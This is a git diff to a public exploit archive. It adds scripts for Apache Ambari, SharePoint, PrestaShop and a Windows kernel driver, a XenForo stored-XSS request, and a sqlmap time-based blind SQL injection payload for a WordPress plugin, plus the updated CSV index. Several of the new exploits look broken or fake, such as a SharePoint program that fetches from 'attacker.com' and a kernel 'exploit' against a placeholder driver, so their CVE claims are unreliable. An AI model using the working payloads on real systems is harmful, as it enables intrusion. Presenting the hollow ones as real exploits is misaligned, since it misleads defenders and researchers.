diff --git a/exploits/multiple/remote/51546.py b/exploits/multiple/remote/51546.py new file mode 100755 index 000000000..6e20dbb81 --- /dev/null +++ b/exploits/multiple/remote/51546.py @@ -0,0 +1,39 @@ +# Exploit Title: Azure Apache Ambari 2302250400 - Spoofing +# Date: 2023-06-23 +# country: Iran +# Exploit Author: Amirhossein Bahramizadeh +# Category : Remote +# Vendor Homepage: +Microsoft +Apache Ambari +Microsoft azure Hdinsights +# Tested on: Windows/Linux +# CVE : CVE-2023-23408 + +import requests + +# Set the URL and headers for the Ambari web interface +url = "https://ambari.example.com/api/v1/clusters/cluster_name/services" +headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"} + +# Define a function to validate the headers +def validate_headers(headers): + if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari": + return False + if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop": + return False + return True + +# Define a function to send a request to the Ambari web interface +def send_request(url, headers): + if not validate_headers(headers): + print("Invalid headers") + return + response = requests.get(url, headers=headers) + if response.status_code == 200: + print("Request successful") + else: + print("Request failed") + +# Call the send_request function with the URL and headers +send_request(url, headers) \ No newline at end of file diff --git a/exploits/multiple/webapps/51543.c b/exploits/multiple/webapps/51543.c new file mode 100644 index 000000000..72dd70eff --- /dev/null +++ b/exploits/multiple/webapps/51543.c @@ -0,0 +1,154 @@ +// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing +// Date: 2023-06-20 +// country: Iran +// Exploit Author: Amirhossein Bahramizadeh +// Category : Remote +// Vendor Homepage: +// Microsoft SharePoint Foundation 2013 Service Pack 1 +// Microsoft SharePoint Server Subscription Edition +// Microsoft SharePoint Enterprise Server 2013 Service Pack 1 +// Microsoft SharePoint Server 2019 +// Microsoft SharePoint Enterprise Server 2016 +// Tested on: Windows/Linux +// CVE : CVE-2023-28288 + +#include +#include + + +// The vulnerable SharePoint server URL +const char *server_url = "http://example.com/"; + +// The URL of the fake SharePoint server +const char *fake_url = "http://attacker.com/"; + +// The vulnerable SharePoint server file name +const char *file_name = "vuln_file.aspx"; + +// The fake SharePoint server file name +const char *fake_file_name = "fake_file.aspx"; + +int main() +{ + HANDLE file; + DWORD bytes_written; + char file_contents[1024]; + + // Create the fake file contents + sprintf(file_contents, "

This is a fake file.

"); + + // Write the fake file to disk + file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); + if (file == INVALID_HANDLE_VALUE) + { + printf("Error creating fake file: %d\n", GetLastError()); + return 1; + } + if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL)) + { + printf("Error writing fake file: %d\n", GetLastError()); + CloseHandle(file); + return 1; + } + CloseHandle(file); + + // Send a request to the vulnerable SharePoint server to download the file + sprintf(file_contents, "%s%s", server_url, file_name); + file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); + if (file == INVALID_HANDLE_VALUE) + { + printf("Error creating vulnerable file: %d\n", GetLastError()); + return 1; + } + if (!InternetReadFileUrl(file_contents, file)) + { + printf("Error downloading vulnerable file: %d\n", GetLastError()); + CloseHandle(file); + return 1; + } + CloseHandle(file); + + // Replace the vulnerable file with the fake file + if (!DeleteFile(file_name)) + { + printf("Error deleting vulnerable file: %d\n", GetLastError()); + return 1; + } + if (!MoveFile(fake_file_name, file_name)) + { + printf("Error replacing vulnerable file: %d\n", GetLastError()); + return 1; + } + + // Send a request to the vulnerable SharePoint server to trigger the vulnerability + sprintf(file_contents, "%s%s", server_url, file_name); + if (!InternetReadFileUrl(file_contents, NULL)) + { + printf("Error triggering vulnerability: %d\n", GetLastError()); + return 1; + } + + // Print a message indicating that the vulnerability has been exploited + printf("Vulnerability exploited successfully.\n"); + + return 0; +} + +BOOL InternetReadFileUrl(const char *url, HANDLE file) +{ + HINTERNET internet, connection, request; + DWORD bytes_read; + char buffer[1024]; + + // Open an Internet connection + internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0); + if (internet == NULL) + { + return FALSE; + } + + // Connect to the server + connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0); + if (connection == NULL) + { + InternetCloseHandle(internet); + return FALSE; + } + + // Send the HTTP request + request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0); + if (request == NULL) + { + InternetCloseHandle(connection); + InternetCloseHandle(internet); + return FALSE; + } + if (!HttpSendRequest(request, NULL, 0, NULL, 0)) + { + InternetCloseHandle(request); + InternetCloseHandle(connection); + InternetCloseHandle(internet); + return FALSE; + } + + // Read the response data + while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0) + { + if (file != NULL) + { + // Write the data to disk + if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL)) + { + InternetCloseHandle(request); + InternetCloseHandle(connection); + InternetCloseHandle(internet); + return FALSE; + } + } + } + + InternetCloseHandle(request); + InternetCloseHandle(connection); + InternetCloseHandle(internet); + return TRUE; +} \ No newline at end of file diff --git a/exploits/php/webapps/51042.txt b/exploits/php/webapps/51042.txt index 1c7b94c48..f9bf2783e 100644 --- a/exploits/php/webapps/51042.txt +++ b/exploits/php/webapps/51042.txt @@ -14,13 +14,13 @@ https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-nex- 2. Install the NEX Forms plugin. -3. Open the URL "/wp-admin/admin.php?page=3Dnex-forms-dashboard&form_id=3D1" in your browser. Save the request to "nex-forms-req.txt" via Burp Suite. +3. Open the URL "/wp-admin/admin.php?page=nex-forms-dashboard&form_id=1" in your browser. Save the request to "nex-forms-req.txt" via Burp Suite. -4. Execute the following command: sqlmap -r nex_forms_req.txt -p form_id --technique=3DT --dbms=3Dmysql --level 5 --risk 3 +4. Execute the following command: sqlmap -r nex_forms_req.txt -p form_id --technique=T --dbms=mysql --level 5 --risk 3 sqlmap will find a time-based blind payload: Parameter: form_id (GET) Type: time-based blind - Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP) - Payload: page=3Dnex-forms-dashboard&form_id=3D1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi) \ No newline at end of file + Title: MySQL >=5.0.12 AND time-based blind (query SLEEP) + Payload: page=nex-forms-dashboard&form_id=1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi) \ No newline at end of file diff --git a/exploits/php/webapps/51545.py b/exploits/php/webapps/51545.py new file mode 100755 index 000000000..110d14d57 --- /dev/null +++ b/exploits/php/webapps/51545.py @@ -0,0 +1,61 @@ +# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory +# Date: 2023-06-20 +# Dork: /modules/winbizpayment/downloads/download.php +# country: Iran +# Exploit Author: Amirhossein Bahramizadeh +# Category : webapps +# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html +# Version: 17.1.3 (REQUIRED) +# Tested on: Windows/Linux +# CVE : CVE-2023-30198 + +import requests +import string +import random + +# The base URL of the vulnerable site +base_url = "http://example.com" + +# The URL of the login page +login_url = base_url + "/authentication.php" + +# The username and password for the admin account +username = "admin" +password = "password123" + +# The URL of the vulnerable download.php file +download_url = base_url + "/modules/winbizpayment/downloads/download.php" + +# The ID of the order to download +order_id = 1234 + +# The path to save the downloaded file +file_path = "/tmp/order_%d.pdf" % order_id + +# The session cookies to use for the requests +session_cookies = None + +# Generate a random string for the CSRF token +csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32)) + +# Send a POST request to the login page to authenticate as the admin user +login_data = {"email": username, "passwd": password, "csrf_token": csrf_token} +session = requests.Session() +response = session.post(login_url, data=login_data) + +# Save the session cookies for future requests +session_cookies = session.cookies.get_dict() + +# Generate a random string for the CSRF token +csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32)) + +# Send a POST request to the download.php file to download the order PDF +download_data = {"id_order": order_id, "csrf_token": csrf_token} +response = session.post(download_url, cookies=session_cookies, data=download_data) + +# Save the downloaded file to disk +with open(file_path, "wb") as f: + f.write(response.content) + +# Print a message indicating that the file has been downloaded +print("File downloaded to %s" % file_path) \ No newline at end of file diff --git a/exploits/php/webapps/51547.txt b/exploits/php/webapps/51547.txt new file mode 100644 index 000000000..d4b92949c --- /dev/null +++ b/exploits/php/webapps/51547.txt @@ -0,0 +1,61 @@ +# Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS +# Date: 2023-06-24 +# Exploit Author: Furkan Karaarslan +# Category : Webapps +# Vendor Homepage: https://x.com/admin.php?smilies +# Version: 2.2.12 (REQUIRED) +# Tested on: Windows/Linux +# CVE : + +----------------------------------------------------------------------------- +Requests + +POST /admin.php?smilie-categories/0/save HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://127.0.0.1/admin.php?smilies/ +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422 +Content-Length: 1038 +Origin: http://127.0.0.1 +Connection: close +Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +-----------------------------333176689514537912041638543422 +Content-Disposition: form-data; name="_xfToken" + +1687616851,83fd2350307156281e51b17e20fe575b +-----------------------------333176689514537912041638543422 +Content-Disposition: form-data; name="title" + + +-----------------------------333176689514537912041638543422 +Content-Disposition: form-data; name="display_order" + +1 +-----------------------------333176689514537912041638543422 +Content-Disposition: form-data; name="_xfRequestUri" + +/admin.php?smilies/ +-----------------------------333176689514537912041638543422 +Content-Disposition: form-data; name="_xfWithData" + +1 +-----------------------------333176689514537912041638543422 +Content-Disposition: form-data; name="_xfToken" + +1687616849,b74724a115448b864ba2db8f89f415f5 +-----------------------------333176689514537912041638543422 +Content-Disposition: form-data; name="_xfResponseType" + +json +-----------------------------333176689514537912041638543422-- + + +Response: After it is created, an alert comes immediately. \ No newline at end of file diff --git a/exploits/windows/local/51544.c b/exploits/windows/local/51544.c new file mode 100644 index 000000000..4a137d634 --- /dev/null +++ b/exploits/windows/local/51544.c @@ -0,0 +1,168 @@ +// Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation +// Date: 2023-06-20 +// country: Iran +// Exploit Author: Amirhossein Bahramizadeh +// Category : webapps +// Vendor Homepage: +// Tested on: Windows/Linux +// CVE : CVE-2023-28293 + +#include +#include + +// The vulnerable driver file name +const char *driver_name = "vuln_driver.sys"; + +// The vulnerable driver device name +const char *device_name = "\\\\.\\VulnDriver"; + +// The IOCTL code to trigger the vulnerability +#define IOCTL_VULN_CODE 0x222003 + +// The buffer size for the IOCTL input/output data +#define IOCTL_BUFFER_SIZE 0x1000 + +int main() +{ + HANDLE device; + DWORD bytes_returned; + char input_buffer[IOCTL_BUFFER_SIZE]; + char output_buffer[IOCTL_BUFFER_SIZE]; + + // Load the vulnerable driver + if (!LoadDriver(driver_name, "\\Driver\\VulnDriver")) + { + printf("Error loading vulnerable driver: %d\n", GetLastError()); + return 1; + } + + // Open the vulnerable driver device + device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + if (device == INVALID_HANDLE_VALUE) + { + printf("Error opening vulnerable driver device: %d\n", GetLastError()); + return 1; + } + + // Fill the input buffer with data to trigger the vulnerability + memset(input_buffer, 'A', IOCTL_BUFFER_SIZE); + + // Send the IOCTL to trigger the vulnerability + if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL)) + { + printf("Error sending IOCTL: %d\n", GetLastError()); + return 1; + } + + // Print the output buffer contents + printf("Output buffer:\n%s\n", output_buffer); + + // Unload the vulnerable driver + if (!UnloadDriver("\\Driver\\VulnDriver")) + { + printf("Error unloading vulnerable driver: %d\n", GetLastError()); + return 1; + } + + // Close the vulnerable driver device + CloseHandle(device); + + return 0; +} + +BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name) +{ + SC_HANDLE sc_manager, service; + DWORD error; + + // Open the Service Control Manager + sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); + if (sc_manager == NULL) + { + return FALSE; + } + + // Create the service + service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL); + if (service == NULL) + { + error = GetLastError(); + if (error == ERROR_SERVICE_EXISTS) + { + // The service already exists, so open it instead + service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS); + if (service == NULL) + { + CloseServiceHandle(sc_manager); + return FALSE; + } + } + else + { + CloseServiceHandle(sc_manager); + return FALSE; + } + } + + // Start the service + if (!StartService(service, 0, NULL)) + { + error = GetLastError(); + if (error != ERROR_SERVICE_ALREADY_RUNNING) + { + CloseServiceHandle(service); + CloseServiceHandle(sc_manager); + return FALSE; + } + } + + CloseServiceHandle(service); + CloseServiceHandle(sc_manager); + return TRUE; +} + +BOOL UnloadDriver(LPCTSTR service_name) +{ + SC_HANDLE sc_manager, service; + SERVICE_STATUS status; + DWORD error; + + // Open the Service Control Manager + sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); + if (sc_manager == NULL) + { + return FALSE; + } + + // Open the service + service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS); + if (service == NULL) + { + CloseServiceHandle(sc_manager); + return FALSE; + } + + // Stop the service + if (!ControlService(service, SERVICE_CONTROL_STOP, &status)) + { + error = GetLastError(); + if (error != ERROR_SERVICE_NOT_ACTIVE) + { + CloseServiceHandle(service); + CloseServiceHandle(sc_manager); + return FALSE; + } + } + + // Delete the service + if (!DeleteService(service)) + { + CloseServiceHandle(service); + CloseServiceHandle(sc_manager); + return FALSE; + } + + CloseServiceHandle(service); + CloseServiceHandle(sc_manager); + return TRUE; +} \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 00346df6d..9764b7615 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10650,6 +10650,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 43984,exploits/multiple/remote/43984.txt,"Axis SSI - Remote Command Execution / Read Files",2017-10-20,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/52e3d6ad93482c97ca4ebcbb81e42f6469b29a0f/Axis%20SSI%20RCE 16312,exploits/multiple/remote/16312.rb,"Axis2 - (Authenticated) Code Execution (via REST) (Metasploit)",2010-12-14,Metasploit,remote,multiple,,2010-12-14,2011-03-06,1,CVE-2010-0219,"Metasploit Framework (MSF)",,,,http://www.rapid7.com/security-center/advisories/R7-0037.jsp 16315,exploits/multiple/remote/16315.rb,"Axis2 / SAP BusinessObjects - (Authenticated) Code Execution (via SOAP) (Metasploit)",2010-12-14,Metasploit,remote,multiple,,2010-12-14,2016-09-21,1,CVE-2010-0219,"Metasploit Framework (MSF)",,,,http://www.rapid7.com/security-center/advisories/R7-0037.jsp +51546,exploits/multiple/remote/51546.py,"Azure Apache Ambari 2302250400 - Spoofing",2023-06-26,"Amirhossein Bahramizadeh",remote,multiple,,2023-06-26,2023-06-26,0,CVE-2023-23408,,,,, 20639,exploits/multiple/remote/20639.txt,"Bajie 0.78 - Arbitrary Shell Command Execution",2001-02-15,joetesta,remote,multiple,,2001-02-15,2012-08-18,1,CVE-2001-0307;OSVDB-762,,,,,https://www.securityfocus.com/bid/2389/info 23257,exploits/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 - Example Scripts and Servlets Cross-Site Scripting",2003-10-16,"Oliver Karow",remote,multiple,,2003-10-16,2012-12-09,1,CVE-2003-1511;OSVDB-2689,,,,,https://www.securityfocus.com/bid/8841/info 20638,exploits/multiple/remote/20638.txt,"Bajie WebServer 0.78/0.90 - Remote Command Execution",2001-02-15,joetesta,remote,multiple,,2001-02-15,2012-08-18,1,CVE-2001-0308;OSVDB-11638,,,,,https://www.securityfocus.com/bid/2388/info @@ -11945,6 +11946,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 18012,exploits/multiple/webapps/18012.txt,"Metasploit Web UI 4.1.0 - Persistent Cross-Site Scripting",2011-10-20,"Stefan Schurtz",webapps,multiple,,2011-10-20,2020-08-22,1,OSVDB-80287,,,,,http://www.rul3z.de/advisories/SSCHADV2011-033.txt 39822,exploits/multiple/webapps/39822.rb,"Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)",2016-05-17,"Karn Ganeshen",webapps,multiple,,2016-05-17,2016-05-17,0,CVE-2016-2296,"Metasploit Framework (MSF)",,,,https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01 39597,exploits/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection",2016-03-23,"Goran Tuzovic",webapps,multiple,80,2016-03-23,2016-03-23,0,,,,,,http://www.mitel.com/security-advisories/mitel-product-security-advisory-16-0001 +51543,exploits/multiple/webapps/51543.c,"Microsoft SharePoint Enterprise Server 2016 - Spoofing",2023-06-26,"Amirhossein Bahramizadeh",webapps,multiple,,2023-06-26,2023-06-26,0,CVE-2023-28288,,,,, 48768,exploits/multiple/webapps/48768.py,"Mida eFramework 2.9.0 - Remote Code Execution",2020-08-27,elbae,webapps,multiple,,2020-08-27,2020-08-27,0,CVE-2020-15920,,,,, 49247,exploits/multiple/webapps/49247.py,"MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)",2020-12-14,securityforeveryone.com,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,, 33019,exploits/multiple/webapps/33019.txt,"miSecureMessages 4.0.1 - Session Management / Authentication Bypass",2014-04-25,"Jared Bird",webapps,multiple,,2014-05-03,2014-05-03,0,CVE-2014-2347;OSVDB-106557,,,,, @@ -15116,7 +15118,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50543,exploits/php/webapps/50543.txt,"Bus Pass Management System 1.0 - 'Search' SQL injection",2021-11-23,"Abhijeet Singh",webapps,php,,2021-11-23,2021-11-23,0,,,,,, 50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",2021-09-06,sudoninja,webapps,php,,2021-09-06,2021-09-06,0,,,,,, 50235,exploits/php/webapps/50235.txt,"Bus Pass Management System 1.0 - 'viewid' SQL Injection",2021-08-30,"Aryan Chehreghani",webapps,php,,2021-08-30,2021-08-30,0,,,,,, -51054,exploits/php/webapps/51054.txt,"Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)",2023-03-25,"Ali Alipour",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-35155,,,,, +51054,exploits/php/webapps/51054.txt,"Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)",2023-03-25,"Ali Alipour",webapps,php,,2023-03-25,2023-06-26,1,CVE-2022-35155,,,,, 9633,exploits/php/webapps/9633.txt,"Bus Script - 'sitetext_id' SQL Injection",2009-09-10,Mr.SQL,webapps,php,,2009-09-09,,1,OSVDB-57985;CVE-2009-4618;OSVDB-57984,,,,, 41561,exploits/php/webapps/41561.txt,"Busewe 1.2 - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,, 41097,exploits/php/webapps/41097.txt,"Business Directory Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php,,2017-01-18,2017-01-18,0,,,,,, @@ -24301,7 +24303,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 2439,exploits/php/webapps/2439.txt,"Newswriter SW 1.42 - 'editfunc.inc.php' File Inclusion",2006-09-27,"Silahsiz Kuvvetler",webapps,php,,2006-09-26,,1,OSVDB-37965;CVE-2006-5102,,,,, 24424,exploits/php/webapps/24424.txt,"Newtelligence DasBlog 1.x - Request Log HTML Injection",2004-09-01,"Dominick Baier",webapps,php,,2004-09-01,2013-01-27,1,CVE-2004-1657;OSVDB-9453,,,,,https://www.securityfocus.com/bid/11086/info 2970,exploits/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - 'mapage.php' Remote File Inclusion",2006-12-21,3l3ctric-Cracker,webapps,php,,2006-12-20,,1,OSVDB-32400;CVE-2006-6711,,,,, -51042,exploits/php/webapps/51042.txt,"NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-3142,,,,, +51042,exploits/php/webapps/51042.txt,"NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-06-26,0,CVE-2022-3142,,,,, 28580,exploits/php/webapps/28580.txt,"NextAge Cart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,meto5757,webapps,php,,2006-09-13,2013-09-28,1,,,,,,https://www.securityfocus.com/bid/20040/info 27734,exploits/php/webapps/27734.txt,"NextAge Shopping Cart - Multiple HTML Injection Vulnerabilities",2006-04-25,R@1D3N,webapps,php,,2006-04-25,2013-08-21,1,CVE-2006-2051;OSVDB-25265,,,,,https://www.securityfocus.com/bid/17685/info 37012,exploits/php/webapps/37012.txt,"NextBBS 0.6 - 'ajaxserver.php' Multiple SQL Injections",2012-03-27,waraxe,webapps,php,,2012-03-27,2015-05-14,1,OSVDB-80637;CVE-2012-1603,,,,,https://www.securityfocus.com/bid/52728/info @@ -28051,6 +28053,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 45047,exploits/php/webapps/45047.txt,"PrestaShop < 1.6.1.19 - 'BlowFish ECD' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,,2018-07-18,2018-07-18,0,CVE-2018-13784,,,,,https://ambionics.io/blog/prestashop-privilege-escalation 51001,exploits/php/webapps/51001.py,"Prestashop blockwishlist module 2.1.0 - SQLi",2022-08-09,"Karthik UJ",webapps,php,,2022-08-09,2022-08-09,0,CVE-2022-31101,,,,, 49267,exploits/php/webapps/49267.txt,"PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection",2020-12-16,"Frederic ADAM",webapps,php,,2020-12-16,2020-12-16,0,,,,,, +51545,exploits/php/webapps/51545.py,"PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory",2023-06-26,"Amirhossein Bahramizadeh",webapps,php,,2023-06-26,2023-06-26,0,CVE-2023-30198,,,,, 15064,exploits/php/webapps/15064.txt,"primitive CMS 1.0.9 - Multiple Vulnerabilities",2010-09-20,"Stephan Sattler",webapps,php,,2010-09-20,2010-09-20,0,CVE-2010-3483;CVE-2010-3482;OSVDB-68194;OSVDB-68154,,,,http://www.exploit-db.comprimitivecms.rar, 27025,exploits/php/webapps/27025.txt,"Primo Place Primo Cart 1.0 - Multiple SQL Injections",2006-01-03,r0t,webapps,php,,2006-01-03,2013-07-23,1,,,,,,https://www.securityfocus.com/bid/16125/info 28264,exploits/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 - 'Include.PCchess.php' Remote File Inclusion",2006-07-24,OLiBekaS,webapps,php,,2006-07-24,2013-09-13,1,,,,,,https://www.securityfocus.com/bid/19138/info @@ -30867,7 +30870,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 15826,exploits/php/webapps/15826.txt,"Traidnt Up 3.0 - Cross-Site Request Forgery",2010-12-25,"P0C T34M",webapps,php,,2010-12-25,2010-12-26,0,,,,,http://www.exploit-db.comTraidnt_up_V3.0.zip, 36736,exploits/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",webapps,php,,2015-04-13,2015-04-13,0,OSVDB-120607,,,,, 5848,exploits/php/webapps/5848.txt,"traindepot 0.1 - Local File Inclusion / Cross-Site Scripting",2008-06-18,"CWH Underground",webapps,php,,2008-06-17,2016-12-08,1,OSVDB-46509;CVE-2008-2839;OSVDB-46508;CVE-2008-2838,,,,, -51043,exploits/php/webapps/51043.txt,"Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-3141,,,,, +51043,exploits/php/webapps/51043.txt,"Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-06-26,1,CVE-2022-3141,,,,, 11155,exploits/php/webapps/11155.txt,"Transload Script - Arbitrary File Upload",2010-01-16,DigitALL,webapps,php,,2010-01-15,,1,,,,,http://www.exploit-db.comtransloader.zip, 6360,exploits/php/webapps/6360.txt,"TransLucid 1.75 - 'FCKeditor' Arbitrary File Upload",2008-09-03,BugReport.IR,webapps,php,,2008-09-02,,1,OSVDB-49430,,,,,http://www.bugreport.ir/index_51.htm 8943,exploits/php/webapps/8943.txt,"TransLucid 1.75 - Multiple Vulnerabilities",2009-06-12,intern0t,webapps,php,,2009-06-11,2016-12-21,1,OSVDB-55385;CVE-2009-2145;OSVDB-55384;OSVDB-55383,,,,,http://forum.intern0t.net/intern0t-advisories/1122-intern0t-translucid-1-75-multiple-vulnerabilities.html @@ -33902,6 +33905,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 5818,exploits/php/webapps/5818.txt,"xeCMS 1.0.0 RC2 - Insecure Cookie Handling",2008-06-14,t0pP8uZz,webapps,php,,2008-06-13,2016-12-07,1,OSVDB-54025;CVE-2008-6714,,,,http://www.exploit-db.comxeCMS-RC2.7z, 4758,exploits/php/webapps/4758.txt,"xeCMS 1.x - 'view.php' Remote File Disclosure",2007-12-19,p4imi0,webapps,php,,2007-12-18,2016-12-07,1,OSVDB-44555;CVE-2007-6508,,,,http://www.exploit-db.comxeCMS-RC2.7z, 39849,exploits/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",webapps,php,443,2016-05-23,2016-05-23,1,,,,,http://www.exploit-db.comXenAPI-1.4.1.tar.gz, +51547,exploits/php/webapps/51547.txt,"Xenforo Version 2.2.13 - Authenticated Stored XSS",2023-06-26,"Furkan Karaarslan",webapps,php,,2023-06-26,2023-06-26,0,,,,,, 8414,exploits/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 - Authentication Bypass",2009-04-13,Dr-HTmL,webapps,php,,2009-04-12,,1,OSVDB-53652,,,,, 28364,exploits/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 - 'profile.php' Directory Traversal",2006-08-09,"Chris Boulton",webapps,php,,2006-08-09,2013-09-18,1,CVE-2006-4161;OSVDB-27916,,,,,https://www.securityfocus.com/bid/19446/info 28406,exploits/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",webapps,php,,2006-08-19,2013-09-20,1,CVE-2006-4279;OSVDB-28090,,,,,https://www.securityfocus.com/bid/19606/info @@ -41577,6 +41581,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49379,exploits/windows/local/49379.txt,"WinAVR Version 20100110 - Insecure Folder Permissions",2021-01-06,"Mohammed Alshehri",local,windows,,2021-01-06,2021-01-06,0,,,,,, 11779,exploits/windows/local/11779.pl,"Windisc 1.3 - Local Stack Buffer Overflow",2010-03-16,Rick2600,local,windows,,2010-03-15,2010-11-12,1,OSVDB-63026,,,,http://www.exploit-db.comwindiscz.exe, 51203,exploits/windows/local/51203.txt,"Windows 11 10.0.22000 - Backup service Privilege Escalation",2023-04-03,nu11secur1ty,local,windows,,2023-04-03,2023-04-06,0,CVE-2023-21752,,,,, +51544,exploits/windows/local/51544.c,"Windows 11 22h2 - Kernel Privilege Elevation",2023-06-26,"Amirhossein Bahramizadeh",local,windows,,2023-06-26,2023-06-26,0,CVE-2023-28293,,,,, 50517,exploits/windows/local/50517.txt,"Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation",2021-11-12,"Marcio Mendes",local,windows,,2021-11-12,2021-11-12,0,,,,,, 48815,exploits/windows/local/48815.txt,"Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software",2020-09-16,hyp3rlinx,local,windows,,2020-09-16,2020-09-16,0,,,,,, 48021,exploits/windows/local/48021.rb,"Windscribe - WindscribeService Named Pipe Privilege Escalation (Metasploit)",2020-02-07,Metasploit,local,windows,,2020-02-07,2020-02-07,1,CVE-2018-11479,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/local/windscribe_windscribeservice_priv_esc.rb